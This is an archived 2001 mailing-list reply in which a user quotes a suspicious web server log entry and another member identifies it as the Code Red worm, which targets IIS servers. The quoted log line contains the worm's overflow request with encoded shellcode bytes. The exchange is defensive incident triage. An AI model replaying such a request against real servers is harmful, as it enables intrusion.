Re: CGI Buffer Overflow?

To: Brian Rectanus <brectanu@vt.edu>
Cc: <debian-security@lists.debian.org>
Subject: Re: CGI Buffer Overflow?
From: Bart-Jan Vrielink <bartjan@vrielink.net>
Date: Fri, 20 Jul 2001 00:56:46 +0200 (CEST)
Message-id: <[🔎] Pine.LNX.4.33.0107200051580.9915-100000@spiderwebs.vrielink.net>
In-reply-to: <[🔎] 3B574E66.9EC27245@brectanu.ais.vt.edu>

On Thu, 19 Jul 2001, Brian Rectanus wrote:

> Anyone seen this before?  I have looked around for similar attacks, but
> cannot find any info.  I assume that is a unicode string padded out with
> Ns.  How would I go about finding out what is in the string?
>
>
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a  HTTP/1.0" 400 328

Code Red Worm. See BUGtraq (and many other lists and websites) for more
information. The worm only infects IIS servers (and possibly crashes some
routers and printers with bad http implementations).

-- 
Tot ziens,

Bart-Jan

Reply to:

References:
- CGI Buffer Overflow?
  - From: Brian Rectanus <brectanu@vt.edu>

Prev by Date: Re: CGI Buffer Overflow?
Next by Date: Re: CGI Buffer Overflow?
Previous by thread: Re: CGI Buffer Overflow?
Next by thread: RE: CGI Buffer Overflow?
Index(es):
- Date
- Thread